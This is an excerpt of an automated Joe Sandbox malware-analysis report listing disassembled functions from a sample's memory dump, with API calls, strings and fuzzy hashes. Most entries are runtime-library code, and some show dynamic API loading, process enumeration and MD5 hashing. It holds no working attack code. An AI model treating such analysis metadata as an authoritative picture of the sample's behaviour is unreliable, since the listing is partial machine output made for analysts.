__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042370F
__allrem.LIBCMT ref: 00423726
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423744
__allrem.LIBCMT ref: 0042375B
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423779

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit_memset
String ID:
API String ID: 1503770280-0
Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
Instruction ID: ab95fd8d4aa8d0004faaa41ec126efad4d06c0b8c45c9850b5361983c80b405c
Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
Instruction Fuzzy Hash: 6E7108B1B00726BBD7149E6ADC41B5AB3B8AF40729F54823FF514D6381E77CEA408798

Uniqueness

Uniqueness Score: -1.00%

Function 00423B4C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 00423B64

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00660000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5

std::exception::exception.LIBCMT ref: 00423B82
__CxxThrowException@8.LIBCMT ref: 00423B97

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

Strings

bad allocation, xrefs: 00423B77

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
String ID: bad allocation
API String ID: 3074076210-2104205924
Opcode ID: a018a04811107607742572bb9273946ce74d37b9b1708be3ced0118e3a2d25af
Instruction ID: 445f5c97f97310cbd08f0009147839d9c604c92f3643d32107fe893a2d7397f3
Opcode Fuzzy Hash: a018a04811107607742572bb9273946ce74d37b9b1708be3ced0118e3a2d25af
Instruction Fuzzy Hash: 74F0F97560022D66CB00AF99EC56EDE7BECDF04315F40456FFC04A2282DBBCAA4486DD

Uniqueness

Uniqueness Score: -1.00%

Function 00427B0B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 7
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___crtCorExitProcess.LIBCMT ref: 00427B11

Part of subcall function 00427AD7: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,i;B,00427B16,i;B,?,00428BCA,000000FF,0000001E,00507BD0,00000008,00428B0E,i;B,i;B), ref: 00427AE6
Part of subcall function 00427AD7: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00427AF8

ExitProcess.KERNEL32 ref: 00427B1A

Strings

i;B, xrefs: 00427B0E

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID: i;B
API String ID: 2427264223-472376889
Opcode ID: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
Instruction ID: 59367741208a4d0b8125be5957acfda0e57e61d39344a7bf1a3f5abf2379cf84
Opcode Fuzzy Hash: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
Instruction Fuzzy Hash: 0DB09230404108BBCB052F52EC0A85D3F29EB003A0B408026F90848031EBB2AA919AC8

Uniqueness

Uniqueness Score: -1.00%

Function 0040EF50 Relevance: 4.6, APIs: 3, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 0040EF69

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00660000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5

_malloc.LIBCMT ref: 0040EF85
_memset.LIBCMT ref: 0040EF9B

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: _malloc$AllocateHeap_memset
String ID:
API String ID: 3655941445-0
Opcode ID: 030ce5304eb8d874ea407c5a52bd42f85663f8070df60884b58911fa6b375070
Instruction ID: 5fa84ec4042e21db229fa26042ce02b7cce951e2f5e2b33d0654eda62efe4b83
Opcode Fuzzy Hash: 030ce5304eb8d874ea407c5a52bd42f85663f8070df60884b58911fa6b375070
Instruction Fuzzy Hash: 06110631600624EFCB10DF99D881A5ABBB5FF89314F2445A9E9489F396D731B912CBC1

Uniqueness

Uniqueness Score: -1.00%

Function 00413A90 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00413B0A

Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64

Strings

vector<T> too long, xrefs: 00413B00

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
String ID: vector<T> too long
API String ID: 657562460-3788999226
Opcode ID: 2b285591458d2a446b0f54d30277c2933d4736c2cdc655e0361b6b87909f156e
Instruction ID: 58ba692ce99c870a1dcba0d104e91e6c126768a8e2c2fae69a1ad948a11fc536
Opcode Fuzzy Hash: 2b285591458d2a446b0f54d30277c2933d4736c2cdc655e0361b6b87909f156e
Instruction Fuzzy Hash: F401F171200705ABD720CFACC09068BFBE8AF80725F20853FEA5583381EBB5E944C784

Uniqueness

Uniqueness Score: -1.00%

Function 0042FB64 Relevance: 3.0, APIs: 2, Instructions: 17
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__lock.LIBCMT ref: 0042FB7B

Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
Part of subcall function 00428AF7: __amsg_exit.LIBCMT ref: 00428B15
Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22

__tzset_nolock.LIBCMT ref: 0042FB8E

Part of subcall function 0042FE47: __lock.LIBCMT ref: 0042FE6C
Part of subcall function 0042FE47: ____lc_codepage_func.LIBCMT ref: 0042FEB3
Part of subcall function 0042FE47: __getenv_helper_nolock.LIBCMT ref: 0042FED4
Part of subcall function 0042FE47: _free.LIBCMT ref: 0042FF07
Part of subcall function 0042FE47: _strlen.LIBCMT ref: 0042FF0E
Part of subcall function 0042FE47: __malloc_crt.LIBCMT ref: 0042FF15

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: __lock$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock_free_strlen
String ID:
API String ID: 1282695788-0
Opcode ID: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
Instruction ID: e2ddc43a93f61bf79f0790849a809cb79cc8f4f227a559e0d4967367be19fad2
Opcode Fuzzy Hash: 92963a37b1ac55d125e1d9796c7b8053ccc5c5112960f7952bb2c963dcdaa470
Instruction Fuzzy Hash: 69E0BF35E41664DAD620A7A2F91B75C7570AB14329FD0D16F9110111D28EBC15C8DA2E

Uniqueness

Uniqueness Score: -1.00%

Function 00416760 Relevance: 1.6, APIs: 1, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 004167E6

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception
String ID:
API String ID: 120817956-0
Opcode ID: 6eb88c17280bca34ae888f82f75249998af471aa2312a62f593c604454cc58e5
Instruction ID: efb258ddcfae47249c3acbfcaa5a8e986a9cbccba7edf1416c99c2e95f316cd5
Opcode Fuzzy Hash: 6eb88c17280bca34ae888f82f75249998af471aa2312a62f593c604454cc58e5
Instruction Fuzzy Hash: B83126B1A016019FDB24DF29C5807AEBBF4EB40364F104A2EE426977C0D738DA80C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 00427F3D Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_doexit.LIBCMT ref: 00427F47

Part of subcall function 00427E0E: __lock.LIBCMT ref: 00427E1C
Part of subcall function 00427E0E: DecodePointer.KERNEL32(00507B08,0000001C,00427CFB,00423B69,00000001,00000000,i;B,00427C49,000000FF,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E5B
Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E6C
Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E85
Part of subcall function 00427E0E: DecodePointer.KERNEL32(-00000004,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E95
Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E9B
Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EB1
Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EBC

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: Pointer$Decode$Encode$__lock_doexit
String ID:
API String ID: 2158581194-0
Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
Instruction ID: a7e7560d2adc556c6fb323ffd13f600db444db9a7111c1ec19eeb8b3048b151f
Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
Instruction Fuzzy Hash: ABB01271A8430C33DA113642FC03F053B0C4740B54F610071FA0C2C5E1A593B96040DD

Uniqueness

Uniqueness Score: -1.00%

Function 00412900 Relevance: 1.3, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000010,-00000400,-00000400), ref: 00412966

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 0c1fed4ebc66c3407f38909d6d576eaf9ee83efa2bb9236ddfd508948eb977ea
Instruction ID: 3b43283c781d39060a285e1a990033b4cd03b7dd602a36c1420ec248ee7b7319
Opcode Fuzzy Hash: 0c1fed4ebc66c3407f38909d6d576eaf9ee83efa2bb9236ddfd508948eb977ea
Instruction Fuzzy Hash: 0411B171A00219EBDF00DF59DC41BDFBBA8EF05718F00452AF819A7280D7BE99558BDA

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00481920 Relevance: 121.3, APIs: 41, Strings: 28, Instructions: 587libraryloaderCOMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(00000094), ref: 00481983
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00481994
LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 004819A1
LoadLibraryA.KERNEL32(NETAPI32.DLL), ref: 004819AE
GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 004819E8
GetProcAddress.KERNEL32(?,NetApiBufferFree), ref: 004819FB
FreeLibrary.KERNEL32(?), ref: 00481AC5
GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 00481ADB
GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 00481AEE
GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00481B01
FreeLibrary.KERNEL32(?), ref: 00481C15
LoadLibraryA.KERNEL32(USER32.DLL), ref: 00481C36
GetProcAddress.KERNEL32(00000000,GetForegroundWindow), ref: 00481C50
GetProcAddress.KERNEL32(?,GetCursorInfo), ref: 00481C63
GetProcAddress.KERNEL32(?,GetQueueStatus), ref: 00481C76
FreeLibrary.KERNEL32(?), ref: 00481D45
GetProcAddress.KERNEL32(?,CreateToolhelp32Snapshot), ref: 00481D73
GetProcAddress.KERNEL32(?,CloseToolhelp32Snapshot), ref: 00481D86
GetProcAddress.KERNEL32(?,Heap32First), ref: 00481D99
GetProcAddress.KERNEL32(?,Heap32Next), ref: 00481DAC
GetProcAddress.KERNEL32(?,Heap32ListFirst), ref: 00481DBF
GetProcAddress.KERNEL32(?,Heap32ListNext), ref: 00481DD2
GetProcAddress.KERNEL32(?,Process32First), ref: 00481DE5
GetProcAddress.KERNEL32(?,Process32Next), ref: 00481DF8
GetProcAddress.KERNEL32(?,Thread32First), ref: 00481E0B
GetProcAddress.KERNEL32(?,Thread32Next), ref: 00481E1E
GetProcAddress.KERNEL32(?,Module32First), ref: 00481E31
GetProcAddress.KERNEL32(?,Module32Next), ref: 00481E44
GetTickCount.KERNEL32 ref: 00481F03
GetTickCount.KERNEL32 ref: 00481FF1
GetTickCount.KERNEL32 ref: 00482066
GetTickCount.KERNEL32 ref: 00482095
GetTickCount.KERNEL32 ref: 004820FB
GetTickCount.KERNEL32 ref: 00482118
GetTickCount.KERNEL32 ref: 00482187
GetTickCount.KERNEL32 ref: 004821A4

Strings

Process32Next, xrefs: 00481DED
CryptGenRandom, xrefs: 00481AE3
Heap32Next, xrefs: 00481DA1
NetStatisticsGet, xrefs: 004819E2
LanmanServer, xrefs: 00481A74
$, xrefs: 00481F7E
CryptReleaseContext, xrefs: 00481AF6
CreateToolhelp32Snapshot, xrefs: 00481D67
Thread32Next, xrefs: 00481E13
USER32.DLL, xrefs: 00481C31
KERNEL32.DLL, xrefs: 0048199C
GetQueueStatus, xrefs: 00481C6B
Module32Next, xrefs: 00481E39
NETAPI32.DLL, xrefs: 004819A9
CryptAcquireContextW, xrefs: 00481AD5
Thread32First, xrefs: 00481E00
Heap32ListFirst, xrefs: 00481DB4
ADVAPI32.DLL, xrefs: 00481989
Heap32First, xrefs: 00481D8E
NetApiBufferFree, xrefs: 004819F0
GetCursorInfo, xrefs: 00481C58
Intel Hardware Cryptographic Service Provider, xrefs: 00481B9C
Heap32ListNext, xrefs: 00481DC7
LanmanWorkstation, xrefs: 00481A26
GetForegroundWindow, xrefs: 00481C4A
Process32First, xrefs: 00481DDA
Module32First, xrefs: 00481E26
CloseToolhelp32Snapshot, xrefs: 00481D7B

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: AddressProc$CountTick$Library$Load$Free$Version
String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$GetCursorInfo$GetForegroundWindow$GetQueueStatus$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next$USER32.DLL
API String ID: 842291066-1723836103
Opcode ID: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
Instruction ID: 1a290f2a1335d0d3a86819d1d60d6f49a84e0195e1de194fff26f42f4ca9d5b3
Opcode Fuzzy Hash: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
Instruction Fuzzy Hash: 683273B0E002299ADB61AF64CC45B9EB6B9FF45704F0045EBE60CE6151EB788E84CF5D

Uniqueness

Uniqueness Score: -1.00%

Function 00410FC0 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 149encryptionstringCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00411010
__CxxThrowException@8.LIBCMT ref: 00411026

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0041103B
__CxxThrowException@8.LIBCMT ref: 00411051
lstrlenA.KERNEL32(?,00000000), ref: 00411059
CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00411064
__CxxThrowException@8.LIBCMT ref: 0041107A
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00411099
__CxxThrowException@8.LIBCMT ref: 004110AB
_memset.LIBCMT ref: 004110CA
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 004110DE
__CxxThrowException@8.LIBCMT ref: 004110F0
_malloc.LIBCMT ref: 00411100
_memset.LIBCMT ref: 0041110B
_sprintf.LIBCMT ref: 0041112E
lstrcatA.KERNEL32(?,?), ref: 0041113C
CryptDestroyHash.ADVAPI32(00000000), ref: 00411154
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0041115F

Strings

%.2X, xrefs: 00411128

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
String ID: %.2X
API String ID: 2451520719-213608013
Opcode ID: 3f68754a9cad00adfa5318296b42566dd369576488fe948bfb568d47563decbb
Instruction ID: afcee35d8fffc0279d29cc69f214b0122642615a52b78f57353c1cfd92a6c2ef
Opcode Fuzzy Hash: 3f68754a9cad00adfa5318296b42566dd369576488fe948bfb568d47563decbb
Instruction Fuzzy Hash: 92516171E40219BBDB10DBE5DC46FEFBBB8FB08704F14012AFA05B6291D77959018BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00411900 Relevance: 29.8, APIs: 16, Strings: 1, Instructions: 95stringmemorywindowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00411915
FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00411932
lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411941
lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411948
LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00411956
lstrcpyW.KERNEL32(00000000,?), ref: 00411962
lstrcatW.KERNEL32(00000000, failed with error ), ref: 00411974
lstrcatW.KERNEL32(00000000,?), ref: 0041198B
lstrcatW.KERNEL32(00000000,00500260), ref: 00411993
lstrcatW.KERNEL32(00000000,?), ref: 00411999
lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 004119A3
_memset.LIBCMT ref: 004119B8
lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 004119DC

Part of subcall function 00412BA0: lstrlenW.KERNEL32(?), ref: 00412BC9

LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411A01
LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00411A04

Strings

failed with error , xrefs: 0041196E

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
String ID: failed with error
API String ID: 4182478520-946485432
Opcode ID: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
Instruction ID: 1677776e610180b78075291f83559cfdcc99dc463041ebd32873df59a21ecb07
Opcode Fuzzy Hash: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
Instruction Fuzzy Hash: 0021FB31A40214B7D7516B929C85FAE3A38EF45B11F100025FB09B61D0DE741D419BED

Uniqueness

Uniqueness Score: -1.00%

Function 0040F730 Relevance: 29.2, APIs: 19, Instructions: 732COMMON

Download Yara Rule

APIs

Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411ACA
Part of subcall function 00411AB0: DispatchMessageW.USER32(?), ref: 00411AE0
Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411AEE

PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF), ref: 0040F900
_memmove.LIBCMT ref: 0040F9EA
PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0040FA51
_memmove.LIBCMT ref: 0040FADA

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: Message$FileFindNamePathPeek_memmove$Dispatch
String ID:
API String ID: 273148273-0
Opcode ID: fc4b9d57ff737a29fd0c32e9b5e231f1385e3f8210e0f352300a49299a5c9bfe
Instruction ID: a2fe25dd57492d494e78aebb36a96054b80ce25314fb01b08d1ce03a62da89f0
Opcode Fuzzy Hash: fc4b9d57ff737a29fd0c32e9b5e231f1385e3f8210e0f352300a49299a5c9bfe
Instruction Fuzzy Hash: D652A271D00208DBDF20DFA4D985BDEB7B4BF05308F10817AE419B7291D779AA89CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040E870 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 165encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000,00000000), ref: 0040E8CE
__CxxThrowException@8.LIBCMT ref: 0040E8E4

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040E8F9
__CxxThrowException@8.LIBCMT ref: 0040E90F
CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 0040E928
__CxxThrowException@8.LIBCMT ref: 0040E93E
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0040E95D
__CxxThrowException@8.LIBCMT ref: 0040E96F
_memset.LIBCMT ref: 0040E98E
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040E9A2
__CxxThrowException@8.LIBCMT ref: 0040E9B4
_sprintf.LIBCMT ref: 0040E9D3

Strings

%.2X, xrefs: 0040E9CD

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
String ID: %.2X
API String ID: 1084002244-213608013
Opcode ID: fcd8fa0c5a880d66c7737978aa9ee8db308b0b96e238434ab4648152bc9c174a
Instruction ID: 6020eefb82f776eec2353dc0ff897aa1862dcd4ecc30860888fbdadc8ba65bc1
Opcode Fuzzy Hash: fcd8fa0c5a880d66c7737978aa9ee8db308b0b96e238434ab4648152bc9c174a
Instruction Fuzzy Hash: 835173B1E40209EBDF11DFA2DC46FEEBB78EB04704F10452AF501B61C1D7796A158BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040EAA0 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 159encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000), ref: 0040EB01
__CxxThrowException@8.LIBCMT ref: 0040EB17

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040EB2C
__CxxThrowException@8.LIBCMT ref: 0040EB42
CryptHashData.ADVAPI32(00000000,?,?,00000000), ref: 0040EB4E
__CxxThrowException@8.LIBCMT ref: 0040EB64
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,?,00000000), ref: 0040EB83
__CxxThrowException@8.LIBCMT ref: 0040EB95
_memset.LIBCMT ref: 0040EBB4
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040EBC8
